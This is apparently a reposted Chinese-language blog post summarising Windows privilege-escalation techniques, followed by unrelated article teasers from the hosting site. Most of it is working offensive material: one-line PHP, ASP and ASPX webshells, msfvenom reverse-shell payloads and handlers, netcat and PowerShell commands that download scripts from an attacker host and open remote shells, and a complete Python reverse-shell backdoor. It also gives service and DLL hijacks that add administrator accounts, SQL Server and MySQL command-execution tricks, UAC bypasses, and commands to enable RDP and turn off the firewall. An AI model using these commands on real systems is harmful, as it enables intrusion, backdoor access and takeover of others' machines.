windows提权总结

news2024/12/29 11:25:36

文章目录

  • windows基础知识
  • 提权总结
    • 基础知识
    • 提权思路
    • metasplit 提权
    • 反弹shell提权
    • windows系统配置错误提权
      • 系统服务权限配置错误
      • 不带引号的服务路径提权
      • 注册键 AlwaysInstallElevated
    • 本地dll劫持提权
    • 第三方提权
      • sqlserver提权
      • mysql提权
      • MOF提权
      • G6FTP提权
    • 绕过UAC bypassuac
    • 远程终端
    • lcx端口转发
  • 补充知识

windows基础知识

基本命令

net user
net user administrator
net localgroup
net user col 123456 /add
net user col  /del
net localgroup Administrators col /add
此时同时存在两个组里面
本地组成员             *Administrators       *Users
cmd /k cmd /c  (keep/close)

内置用户组

administrators,管理员组

users组,新建用户默认所属的组

guests组,权限最低

iis_users组 Internet 信息服务使用的内置组。

SID

使用标准表示法将 SID 从二进制转换为字符串格式时,SID 的组件更容易可视化:

S-R-X-Y1-Y2-Yn-1-Yn

在这种表示法中,下表描述了 SID 的组成部分:

评论说明
S指示字符串是 SID
R指示修订级别
X指示标识符颁发机构值
Y表示一系列子授权值,其中 n 是值的数目

内置管理员组的 SID 以标准化 SID 表示法表示为以下字符串:

S-1-5-32-544

此 SID 包含四个组成部分:

  • 修订级别 (1)
  • 标识符颁发机构值(5, NT Authority)
  • 域标识符 (32, Builtin)
  • 相对标识符 (544, Administrators)

域 (Contoso\Domain Admins) 中的“Domain Admins”组的 SID:

S-1-5-21-1004336348-1177238915-682003330-512

Contoso\Domain Admins 的 SID 具有:

  • 修订级别 (1)
  • 标识符颁发机构(5,NT Authority)
  • 域标识符 (21-1004336348-1177238915-682003330, Contoso)
  • 相对标识符(512,Domain Admins)

提权总结

基础知识

概念

webshell的权限根据不同的中间件权限有所不同,如没经过特殊设置则继承该中间件的权限。

webshell的默认权限是iis_users组中的

常用方法

windows的常用提权方法,主要分为漏洞提权、windwos特性提权、第三方组件提权,数据库提权和ftp

提权等

基础命令

systeminfo | findstr OS #获取系统版本信息
systeminfo&&wmic product get name,version&&wmic nic where PhysicalAdapter=True
get MACAddress,Name&&wmic NICCONFIG WHERE IPEnabled=true GET IPAddress #检测系统软件包
hostname #获取主机名称
whoami /all #获取当前用户的详细信息
whoami /priv #显示当前用户的安全特权
net start #查看服务
Set #环境变量
quser or query user #获取在线用户
netstat -ano | findstr 3389 #获取rdp连接来源IP
dir c:\programdata\ #分析安装杀软
wmic qfe get Caption,Description,HotFixID,InstalledOn #列出已安装的补丁
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber #获取远程端口,默认3389
tasklist /svc | find "TermService" #获取服务pid
netstat -ano |find "pid" #获取远程端口
wmic os get caption # 查看系统名
wmic qfe get Description,HotFixID,InstalledOn #查看补丁信息
mstsc #远程桌面连接

常见杀软

360sd.exe 360杀毒
360tray.exe 360实时保护
ZhuDongFangYu.exe 360主动防御
KSafeTray.exe 金山卫士
SafeDogUpdateCenter.exe 安全狗
McAfee McShield.exe McAfee
egui.exe NOD32
AVP.exe 卡巴斯基
avguard.exe 小红伞

常见 webshell 所处的权限

  • ASP、PHP - 匿名权限
  • ASPX - user 权限
  • JSP - 通常是系统权限

一句话木马

php: <?php @eval($_POST['pass']);?>
asp: <%eval request ("pass")%>
aspx: <%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

提权思路

信息收集

机器的系统及其版本
机器的打补丁情况
机器安装的服务
机器的防火墙策略配置
机器的防护软件情况

导入系统信息

systeminfo > C:\ProgramData\sysinfo.txt

补丁查询

https://i.hacking8.com/tiquan //在线查询
wesng
WindowsVulnScan

wesng用法

sudo proxychains4 python3 wes.py --update
python3 wes.py systeminfo.txt
python3 wes.py systeminfo.txt  -o vulns.csv
python wes.py systeminfo.txt --impact "Remote Code Execution" -o vulns.csv
python wes.py systeminfo.txt --impact "Remote Code Execution" -e -o vulns.csv

查询可写目录或文件

wt.aspx

wt.asp

在可写目录上传提权用的exe,然后执行命令

c:\windows\debug\WIA\
C:/windows/debug/WIA/PrintSpoofer64.exe -i -c whoami

metasplit 提权

反向连接后门

//启动
msfconsole
//生成反向连接后门
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.128 lport=12345 -f exe > s.exe

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.128
set lport 12345
show options
set AutoRunScript migrate -f
exploit
background

meterpreter > getuid
Server username: IIS APPPOOL\DefaultAppPool

windwos常见的提权模块

ms14_058 内核模式驱动程序中的漏洞可能允许远程执行代码
ms16_016 WebDAV本地提权漏洞(CVE-2016-0051)
ms16_032 MS16-032 Secondary Logon Handle 本地提权漏漏洞

msf的基础命令

ps 列出进程
background 把session放置后台
sessions 查看会话
back 返回主界面
shell得到终端
search搜索模块
show 列模块
info 查看模块信息
use 使用模块

run post/windows/gather/enum_patches  查询补丁

use post/multi/recon/local_exploit_suggester   使用模块提权审查
set session 1
exploit

use exploit/windows/local/ms16_075_reflection_juicy 使用存在的exp
show options
set session 2
run
getuid
//meterpreter > getuid
//Server username: NT AUTHORITY\SYSTEM

维持权限

系统是x64,把后门迁移到别的进程

getpid	查看当前shell进程号
ps		列出正在运行进程
migrate 2744 迁移进程号
run post/windows/manage/migrate	自动寻找合适进程迁移

反弹shell提权

交互shell

交互shell就是shell等待你的输入,并且立即执行你提交的命令。

这种模式被称作交互式是因为shell与用户进行交互。

需要进行信息交互,例如输入某个信息 会返回信息 你需要对其输入内容,输入会执行命令。

例如:cmd终端 msf反弹后门shell nc反弹shell 这些都属于交互shell

非交互shell

非交互式模式,以shell script(非交互)方式执行。

在这种模式下,shell不与你进行交互,而是读取存放在文件中的命令,并且执行它们。

当它读到文件的结尾,shell也就终止了。

nc反弹shell

上传nc.exe,然后执行命令

C:/ProgramData/nc.exe -e cmd 192.168.10.128 6666

powershell反弹cmd

攻击者监听

nc -lvnp 6666
在powercat.ps1页面开启一个服务器
python -m http.server 80
powershell IEX (New-Object system.Net.Webclient).DownloadString('http://192.168.10.128/powercat.ps1'); powercat -c 192.168.10.128 -p 6666 -e cmd

nishang反弹shell

Reverse TCP shell

powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.10.128/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.10.128 -port 6666

Reverse TCP shel

nc -lvup 53
powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.10.128/nishang/Shells/Invoke-PowerShellUdp.ps1');Invoke-PowerShellUdp -Reverse -IPAddress 192.168.10.128 -port 53

python反弹shell

import asyncio
import socket
import argparse

parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter, 
                                 description="###############         pycat         ###############\n" \
                                             "          Windows Reverse TCP backdoor\n"
                                             "Usage: python pycat.py --host netcatIP --port PORT\n\n" \
                                             "Demo:  youtube.com/watch?v=3sMhHL6c68E\n"\
                                             "GitHub:  github.com/danielhnmoreno/pycat\n" \
                                             "Contact: contato@bluesafe.com.br")

parser.add_argument('--host', action = 'store', dest = 'host', required = True, help = 'Host listening for reverse connection')
parser.add_argument('--port', action = 'store', type=int, dest = 'port', required = True, help = 'Port')

arguments = parser.parse_args()

HOST = arguments.host
PORT = arguments.port


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

async def shell():
    while 1:
        proc = await asyncio.create_subprocess_shell("cmd",
                                                     stdin=asyncio.subprocess.PIPE,
                                                     stdout=asyncio.subprocess.PIPE,
                                                     stderr=asyncio.subprocess.STDOUT)
        cmd = b"\n"
        proc.stdin.write(cmd)

        while 1:
            while 1:
                out = await proc.stdout.readline()
                break_ = out.decode("latin-1")
                if break_[-2:] == ">\n" or break_[-3:] == "> \n":
                    s.send(out[:-1])
                    break
                elif break_.endswith(">" + cmd.decode()) or break_.endswith("> " + cmd.decode()):
                    pass
                else:
                    s.send(out)

            cmd = s.recv(1024)
            cmd_ = cmd.decode()
            if cmd_ == "\n":
                proc.stdin.write(b"\n")
            elif cmd_.startswith("exit"):
                proc.terminate()
                break
            else:
                proc.stdin.write(cmd + b"\n")

asyncio.set_event_loop_policy(asyncio.WindowsProactorEventLoopPolicy())
asyncio.run(shell())
python pycat.py --host 192.168.10.128 --port 6666
C:\Python\Python39\python.exe C:\pycat.py --host 192.168.10.128 --port 6666

pyinstaller -Fw pycat.py
pycat.exe --host 192.168.10.128 --port 6666

windows系统配置错误提权

系统服务权限配置错误

Windows在系统启动时,会伴随着一些高权服务启动(windows服务是以system权限运行的),倘若某些服务存在一些漏洞,那么就能够借此服务进行权限劫持,例如DLL劫持

windows系统服务文件在操作系统启动时加载执行,并在后台调用可执行文件。如果一个低权限的用户 对此类系统服务调用的可执行文件拥有写权限,那么就可以替换该文件,并随着系统启动获得控制权 限。 windows服务是以system权限运行的,其文件夹、文件和注册表key-value都是受强制访问控制保护 的。但是在某些情况下,操作系统中依然存在一些没有得到有效保护的服务。

PowerUP脚本

powershell -nop -exec bypass -c "IEX (New-Object
Net.WebClient).DownloadString('http://192.168.10.128/PowerUp.ps1'); Invoke-AllChecks"

PrivescCheck脚本

推荐使用PrivescCheck

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.10.128/PrivescCheck.ps1'); Invoke-PrivescCheck"

关注Service Permissions 中扫到的服务及权限和用户

+------+------------------------------------------------+------+
| TEST | SERVICES > Service Permissions                 | VULN |
+------+------------------------------------------------+------+
| DESC | Interact with the Service Control Manager (SCM) and   |
|      | check whether the current user can modify any         |
|      | registered service.                                   |
+------+-------------------------------------------------------+
[*] Found 1 result(s).

Name              : UsoSvc
ImagePath         : C:\WINDOWS\system32\svchost.exe - k netsvcs - p
User              : LocalSystem
AccessRights      : AllAccess
IdentityReference : NT AUTHORITY\SERVICE
Status            : Stopped
UserCanStart      : True

whoami /all

NT AUTHORITY\SERVICE      已知组      S-1-5-6      必需的组, 启用于默认, 启用的组
iis apppool\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415

上面的IIS用户账户隶属于NT AUTHORITY\SERVICE组,我们可以以NT AUTHORITY\SERVICE组中用户的身份运行如下命令

sc query UsoSvc
sc stop UsoSvc
sc config UsoSvc binpath= "cmd.exe /c net user /add Only Qwer1234 &"
sc start UsoSvc 

sc stop UsoSvc 
sc config UsoSvc binpath= "cmd.exe /c net localgroup administrators /add only &"
sc start UsoSvc

sc stop UsoSvc
sc config UsoSvc binpath= "C:\WINDOWS\system32\svchost.exe -k netsvcs -p" 
sc start UsoSvc

我们可将 UsoSvc服务设置为后门程序,此连接一般不稳定,建议尽快进行后门迁移

sc config usosvc binPath= "C:\ProgramData\s.exe"   //将 UsoSvc服务设置为后门程序
set AutoRunScript migrate -f 自动迁移进程
sc start UsoSvc
//此时开始接受监听,返回system权限

Metasploit中的攻击模块 exploit/windows/local/service_permissions

service_permissions模块会使用两种方式获取system权限,如果以管理员权限运行,会尝试创建并运行一

个新的服务。如果当前权限不允许创建服务,会判断哪些服务的文件或文件夹的权限有问题,并对其进行劫

持,在劫持服务时会创建一个可执行程序,其文件名和安装路径都是随机的。

不带引号的服务路径提权

有引号正常执行,没有双引号的时候,windows会把空格前面的当做exe文件执行

使用PowerUp.ps1或PrivescCheck进行检测,会遍历出带有空格的文件路径

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.10.128/PowerUp.ps1');Invoke-AllChecks"
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.10.128/PrivescCheck.ps1'); Invoke-PrivescCheck"

或者使用命令

wmic service get name,displayname,pathname,startmode|findstr /i "Auto" |findstr /i /v "C:Windows" |findstr/i /v """
Name        : 2345PicSvc
DisplayName : 2345看图王核心服务
ImagePath   : C:\Program Files (x86)\2345Soft\2345Pic\protect\Pic_2345Svc.exe
User        : LocalSystem
StartMode   : Automatic
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.128 lport=12345 -f exe > s.exe
改名为Program.exe,上传到c盘,服务器重启后metasplit拿到system权限(系统在重启或者管理员重启该服务的时候就会获取系统权限,如果有执行权限也可直接执行)

注册键 AlwaysInstallElevated

允许低权限用户以System权限安装文件。如果启用此策略设置项,那么任何权限的用户都以NT Authority\System权限来安装恶意的MSI文件。

使用系统权限通过命令行修改注册表值为1

reg add HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /t REG_DWORD /d 1

使用PowerUp检测注册表是否有设置,如果返回True证明可以利用

powershell -nop -exec bypass  IEX(New-Object Net.WebClient).DownloadString('http://192.168.10.128/PowerUp.ps1'); Get-RegAlwaysInstallElevated

iis_user组用户权限不足 返回false,但是一般普通用户是拥有权限的,可能会返回True。

获取Metasploit 下的利用

Metasploit中相应的利用模块为exploit/windows/local/always_install_elevated,可以利用该模块来完成以上操作。使用该模块设置好SESSION,运行exploit后,会返回一个system权限的meterpreter。该模块会创建一个文件名随机的MSI文件,并在提权后删除所有已经部署的文件。

自动安装配置文件提权

网络管理员在内网中给多台机器配置同一个环境的时候,一般会使用脚本进行批量部署,也就是会使用

安装配置文件,这些文件中包含所有的安装配置信息,其中还有一些包含着本地管理员账号和密码。

dir /b /s c:\Unattend.xml
/s:显示指定目录和所有子目录中的文件。

也可以使用msf的post/windows/gather/enum_unattend对这个配置文件扫描

使用Powerup扫描

powershell -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://host/powerup.ps1');Get-UnattendedInstallFile"

本地dll劫持提权

Windows应用程序有其预定义好的搜索DLL的路径,它会根据下面的顺序进行搜索:

1、应用程序加载的目录
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、当前工作目录Current Working Directory,CWD
6、在PATH环境变量的目录(先系统后用户)
  • 收集进程加载的dll

手动可以使用火绒剑分析进程执行时加载了哪些dll,尽量选择调用靠后或不影响进程启动的dll文件,否则会容易导致进程无法启动,系统文件一般我们都是没有权限更改不了的,所以一般选择未知文件和数字签名文件

用火绒剑找到一个数字签名文件

C:\Program Files (x86)\2345Soft\2345Pinyin\7.9.1.8320\libcurl_x86.dll

  • 制作dll木马并上传

生成dll文件上传并在进程未启动时替换原来的dll

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.128 lport=12345 -f dll > libcurl_x86.dll

结束进程

/c taskkill /f /im "2345PinyinCloud.exe" /t

监听,启动服务即可

/c C:\Program Files (x86)\2345Soft\2345Pinyin\7.9.1.8320\2345PinyinCloud.exe

第三方提权

安装第三方的软件例如 mysql sqlserver ftp等应用软件,如果权限设置不对,会对服务器造成安全隐患,从而导致服务器被提权。

sqlserver提权

敏感文件

web.config
config.asp
conn.aspx
database.aspx

如果网站里面使用的数据库是sqlserver,那么如果找到sa的密码,利用提权脚本,执行命令,但是不一定是系统权限,还要看管理员安装sqlserver的权限设置,一般情况是system权限或者pulic

netstat -ano
发现1433端口

用aspx工具中的DataBase连接SQL server

#检测xp_cmdshell是否开启
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell';


#如果xp_cmdshell被删除,可以使用命令加载
dbcc addextendedproc("xp_cmdshell","xplog70.dll");


#如果xplog70.dll文件被删除,可手动上传恢复
exec master.sys.sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll';


#启动xp_cmdshell扩展存储过程
exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure;
# 默认情况下sp_configure无法查看和更改高级配置选项,show advanced options”用来显示或更改当前服务器的全局配置设置。当“显示高级选项” 设置为 1 时(默认值为 0),可以使用 sp_configure 列出、更改高级选项。
# reconfigure使语句执行后立即生效,若无此命令,需重启SQLserver后才生效。


#查看权限
exec xp_cmdshell "whoami";


#提权
exec xp_cmdshell "net user only Qwer1234 /add"
exec xp_cmdshell "net localgroup administrators only /add"
exec xp_cmdshell "net user only"


#远程登陆,查看3389状态
exec master.dbo.xp_cmdshell 'netstat -ano';
#如果3389没开,使用写入注册表方式开启
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;exec master..xp_cmdshell "REG ADD HKLMISYSTEMCurrentControlSetlControNTerminal" "Server Iv fDenyTSConnections /t REG_ DWORD /d 0 /f"

mysql提权

提权条件

  1. 具有MySQL的root权限,且MySQL以system权限运行。

  2. 具有执行SQL语句的权限。

  3. 查询plugin插件目录
    show variables like "%plugin%"
    
    如果不存在的话可以在webshell找到mysql的安装目录然后手动创建\lib\plugin
    select @@basedir;
    
    查看是否开启secure_file_priv
    SELECT @@global.secure_file_priv
    

获取root密码的方法:

1. 查看数据库配置文件
   关键字:`config``conn``sql``data``inc``database`2. 下载mysql安装路径下的数据文件
   - 安装路径下的data目录中存放的是数据库的数据信息
   - root账号密码存储在mysql数据库下的user表中
   - 完整路径=安装路径+`\data\mysql\user.MYD`
3. 3306端口弱口令爆破
4. sqlmap注入 `--sql-shell`模式

php文件连接后先导出udf,再创建函数

C:/phpStudy/MySQL/lib/plugin/moonudf.dll

UDF提权

UDF可以理解为MySQL的函数库,可以利用udf定义的创建函数。想要利用udf,必须上传udf.dll作为udf的执行库。MySQL中支持UDF扩展,使得我们可以调用DLL里面的函数来实现一些特殊的功能。

利用条件

如果mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的MySQL\Lib\Plugin\文件夹下,该目录默认是不存在的,需要使用webshell找到mysql的安装目录,并在安装目录下创建MySQL\Lib\Plugin\文件夹,然后将udf.dll导入到该目录。

如果mysql版本小于5.1,udf.dll文件在windows server 2003下放置于c:/windows/system32/目录,在windows server 2000下放置在c:/winnt/system32/目录。

掌握mysql数据库的root账户,从而拥有对mysql的insert和delete权限,以创建和抛弃函数。

拥有可以将udf.dll写入相应目录的权限。

mysql提权问题

1.版本有32 和64位的mysql 创建函数的方法一样,但是64版本的要用64的udf.dll

2.The MySQL server is running with the –secure-file-priv option so it cannot execute this

statement

这种是mysql默认设置是不允许导入导出 需要在my.ini添加 secure-file-priv = 保存重启mysql即可

3.Can’t create/write to file ‘D:\phpStudy\MySQL\lib\plugin\moonudf.dll

这种是没有权限导出或者plugin目录不存在,需要手动创建或者权限不够

MOF提权

MOF 提权是一个有历史的漏洞,基本上在 Windows Server 2003 的环境下才可以成功。提权的原理是C:/Windows/system32/wbem/mof/目录下的 mof 文件每 隔一段时间(几秒钟左右)都会被系统执行,因为这个 MOF 里面有一部分是 VBS 脚本,所以可以利用这个 VBS 脚本来调用 CMD 来执行系统命令,如果 MySQL 有权限操作 mof 目录的话,就可以来执行任意命令了。

利用条件

  1. 只使用于windows系统,一般低版本系统才可以用,比如xpserver2003
  2. C:\Windows\System32\wbem\MOF目录有读写权限
  3. secure-file-priv参数开启

上传mof.php(zkeys)到网站目录下

net.exe user coleak$ xxx12456 /add && net localgroup administrators coleak$ /add

G6FTP提权

G6FTP的默认端口为8021,只侦听在127.0.0.1的8021端口上,所以无法从外部直接访问,需要使用lcx 工具进行端口转发。

漏洞复现

在webshell访问 配置文件 C:\Program Files (x86)\Gene6 FTP Server\RemoteAdmin\Remote.ini

使用端口转发工具将8021端口转发出来

C:\ProgramData\lcx.exe -tran 2333 127.0.0.1 8021

另开一台win10攻击机,安装好服务

在这里插入图片描述

进入域,创建用户并设置用户主目录为C:\,访问权限为所有,将添加管理员命令保存为bat文件,上传到目标并在设置中添加批处理命令

在这里插入图片描述

net user only QWEasd123 /add && net localgroup administrators only /add

在命令行中登录ftp,并执行批处理命令,但是执行失败了

quote stie ADD

ftp://192.168.10.146/右键登录进入c盘,利用C:\可写,利用错误配置(不带引号的服务路径提权)上传Program.exe,重启后提权成功

利用C:\可写,将bat文件写入到自启动项提权,或者直接写入后门文件

管理员下次登陆时会执行文件

ftp://192.168.10.146/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/

net user only QWEasd123 /add && net localgroup administrators only /add

绕过UAC bypassuac

需要UAC的授权才能进行的部分操作列表如下:

配置Windows Update

增加、删除账户

更改账户类型

更改UAC的设置

安装ActiveX

安装、卸载程序

安装设备驱动程序

将文件移动/复制到Program Files或Windows目录下

查看其它用户的文件夹

Bypassuac提权的MSF模块

use exploit/windows/local/bypassuac  
#该模块运行时会因为在目标机上创建多个文件而被杀毒软件识别,因此通过该模块提权成功率很低。

use exploit/windows/local/bypassuac_injection  
#该模块直接运行在内存的反射DLL中,所以不会接触目标机器的硬盘,从而降低了被杀毒软件检测出来的概率。
set session 1
getsystem
迁移进行到64进程即可hashdump

MSF中Bypassuac模块的使用前提有两个:

  1. 系统当前用户必须在管理员组中,
  2. 用户账户控制程序UAC设置为默认,即 “仅在程序试图更改我的计算机时通知我”

远程终端

在较高的权限下可以使用注册表命令 进行开启

2008 or 2012 or 2016 开启3389

echo DO ALL IN CMD! 
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 3389 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f

msf命令开启3389端口

run getguid -e

一条命令开启3389

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

WMIC命令开启3389

  • 支持系统

    Win2k3/Win7/Win2k8/Win8.1/Win10/2012/2016(1:ON、0:OFF)

前提条件是确保“Windows Management Instrumentation(Winmgmt)”服务已正常启动。

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
  • 支持系统

Win2k/XP/Win2k3

wmic /node:192.168.0.103 /user:administrator/password:betasec PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1
  • 支持系统

Win7/Win2k8/Win8.1/Win10/2012/2016

wmic /node:192.168.0.116/user:administrator/password:betasec RDTOGGLE WHERE ServerName='WINTO2CN3V2VPR' call SetAllowTSConnections 1

wmic /node:192.168.0.116 /user:administrator/password:betasec process call create 'cmd.exe /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer" /v fDenyTSConnections /t REG_DWORD /d 0 /f'

查询是否开启3389

0为On 1为OFF

REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

lcx端口转发

本地转发:客户端–>127.0.0.1:3307–>127.0.0.1:3306

lcx.exe -tran 3307 127.0.0.1 3306

远程转发

服务端执行

lcx.exe -slave client-host 2333 127.0.0.1 3389

客户端执行

lcx.exe -listen 51 2333

客户端或攻击者使用远程终端连接本地client-host:51即登录服务端3389的远程桌面

补充知识

git配置命令

git config --global http.proxy #查看git的http代理配置
git config --global https.proxy #查看git的https代理配置
git config --global -l #查看git的所有配置
git config --list
git config --global --unset http.proxy
git config --global --unset https.proxy
git config --global http.proxy 10.133.40.227:7890
git config --global https.proxy 10.133.40.227:7890
git config --global --edit

网络 代理/共享

之前给kali开启代理时将WLAN设置了共享,该选项会导致物理机不能接通虚拟机,因此需要提前关掉共享选项再访问虚拟机。

php内置服务器

php -S 0.0.0.0:80 -t `pwd`

python内置服务器

python -m http.server 8080 # 指定端口号为8080, 默认端口号为8000

nc参数

  -g<网关>         设置路由器跃程通信网关,最多可设置8个。
  -G<指向器数目>   设置来源路由指向器,其数值为4的倍数。
  -h               在线帮助。
  -i<延迟秒数>     设置时间间隔,以便传送信息及扫描通信端口。
  -l               监听模式,用于入站连接 (监听本地端口)-n               直接使用IP地址,而不通过域名服务器。
  -o<输出文件>     指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存。
  -p<通信端口>     设置本地主机使用的通信端口。
  -r               随机指定本地与远端主机的通信端口。
  -s<来源位址>     设置本地主机送出数据包的IP地址。
  -u               使用UDP传输协议。
  -v               显示指令执行过程。
  -w<超时秒数>     设置等待连线的时间。

远程桌面

mstsc

关闭防护墙

netsh advfirewall show allprofile state 查询状态

netsh advfirewall set allprofiles state off 关闭防火墙

net stop "Windows Firewall" 关闭防火墙

sc config sharedaccess start= disabled 禁用防火墙

net stop sharedaccess 关闭防火墙

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/736826.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

前端|HTML

参考视频&#xff1a;黑马程序员前端Html5教程&#xff0c;前端必备基础 目录 &#x1f4da;web标准 &#x1f4da;HTML认识 &#x1f407;HTML的概念 &#x1f407;开发工具 &#x1f407;HTML标签基础 ⭐️HTML骨架标签 ⭐️HTML元素标签分类 ⭐️HTML标签关系&#…

一款可源码交付的Java可视化建模规则引擎

规则引擎是一种根据规则中包含的指定过滤条件&#xff0c;判断其能否匹配运行时刻的实时条件来执行规则中所规定的动作的引擎。 规则引擎由推理引擎发展而来&#xff0c;是一种嵌入在应用程序中的组件&#xff0c;实现了将业务决策从应用程序代码中分离出来&#xff0c;并使用预…

FPGA纯verilog实现10G UDP协议栈,XGMII接口UltraScale GTY驱动,提供工程源码和技术支持

目录 1、前言2、我这里已有的UDP方案3、该UDP协议栈性能4、详细设计方案SFPSGMII收发接口模块AXIS FIFOUDP协议栈UltraScale FPGAs Transceivers Wizard GTY 5、vivado工程6、上板调试验证并演示准备工作查看ARPUDP数据回环测试 7、福利&#xff1a;工程代码的获取 1、前言 目…

SpringBoot原理分析 | 安全框架:Security

&#x1f497;wei_shuo的个人主页 &#x1f4ab;wei_shuo的学习社区 &#x1f310;Hello World &#xff01; Security Spring Security是一个能够为基于Spring的企业应用系统提供声明式的安全访问控制解决方案的安全框架&#xff1b;提供一组可以在Spring应用上下文中配置的Be…

使用作用域函数简化您的 Kotlin 代码:释放对象的力量

使用作用域函数简化您的 Kotlin 代码&#xff1a;释放对象的力量 欢迎&#xff0c;亲爱的 Kotlin 爱好者&#xff01;厌倦了在处理对象时反复书写相同的代码吗&#xff1f;别担心&#xff01;Kotlin 的作用域函数来拯救你&#xff0c;为你的编码之旅增添优雅的色彩。在这篇有趣…

华为认证 | 7月底这门HCIA认证即将发布!

华为认证HCIA-Cloud Service V3.5&#xff08;中文版&#xff09;预计将于2023年7月31日正式对外发布。 为了帮助您做好学习、培训和考试计划&#xff0c;现进行预发布通知&#xff0c;请您关注。 01 发布概述 基于“平台生态”战略&#xff0c;围绕“云-管-端”协同的新ICT技…

小程序学习(三):小程序的宿主环境

1.什么是宿主环境 宿主环境指的是程序运行所必须的依赖环境。例如:Android系统和IOS系统是两个不同的宿主环境。安卓版的微信App是不能在IOS环境下运行的,所以Android是暗转软件的宿主环境,脱离宿主环境的软件是没有任何意义的! 2.小程序的宿主环境 小程序借助宿主环境提供的能…

(4)【轨迹优化篇】线性加权轨迹代价损失评分,轨迹多选一方法--DWA_planner、Open_Planner、lexicographic_planner

系列文章目录 提示&#xff1a;这里可以添加系列文章的所有文章的目录&#xff0c;目录需要自己手动添加 TODO:写完再整理 文章目录 系列文章目录前言1、设计代价损失函数进行评分、线性加权法、迹评分轨迹多选一的轨迹优化设计思想&#xff08;1&#xff09;设计代价函数进行…

适用于企业级工作负载的混合闪存存储

NetApp FAS9500、FAS8700、FAS8300&#xff1a;适用于企业级工作负载的 FAS 拥有企业级应用程序和私有云的客户通常部署这些系统来作为架构基础。通过与主要超大规模云提供商的简单集成创建统一的混合云 借助 NetApp FAS 按需扩展性能 客户将这些平台描述为“重型”&#xff0…

2023年开源社执行委员会介绍

总起 开源社的各项工作主要分为内部事务、对外事务与专项工作三大类。整体而言&#xff0c;基础设施、财务、法律与成员发展等工作较为偏向于内部事务&#xff0c;而活动、媒体、社区合作、顾问委员会服务、国际接轨等工作偏向于对外联络与展现&#xff0c;而教育、公益、硬件、…

基于Tensorflow来重现GPT v1模型

OpenAI推出的ChatGPT模型让我们看到了通用人工智能的发展潜力&#xff0c;我也找了GPT的相关论文来进行研究。OpenAI在2017年的论文Improving Language Understanding by Generative Pre-Training提出了GPT的第一个版本&#xff0c;我也基于这个论文来用Tensorflow进行了复现。…

红外雨量计(光学雨量传感器)在监测降雨量的应用

红外雨量计&#xff08;光学雨量传感器&#xff09;在监测降雨量的应用 红外雨量计是一种基于红外光学原理的降雨量监测设备。它利用红外传感器检测雨滴落在传感器上时所产生的反射光信号&#xff0c;根据信号的强弱和持续时间计算出降雨强度和累计降雨量。 红外雨量计在监测降…

FITC Biotin(134759-22-1),5-FAM azide(510758-23-3),荧光素标记试剂的特点

Part1-----FITC-Biotin&#xff0c;134759-22-1 基础产品数据&#xff08;Basic Product Data&#xff09;&#xff1a; CAS号&#xff1a;134759-22-1 中文名&#xff1a;异硫氰酸荧光素标记生物素 英文名&#xff1a;FITC-Biotin&#xff0c;Fluorescein Biotin&#xff0c;…

vue element select下拉框树形多选

components 文件下新建 SelectTree文件 index.vue SelectTree index.vue <!--* 下拉树形选择 组件--> <template><el-select ref"select" style"min-width: 260px" :value"value" v-model"valueName" collapse-tags :…

Python应用实例(一)外星人入侵(七)

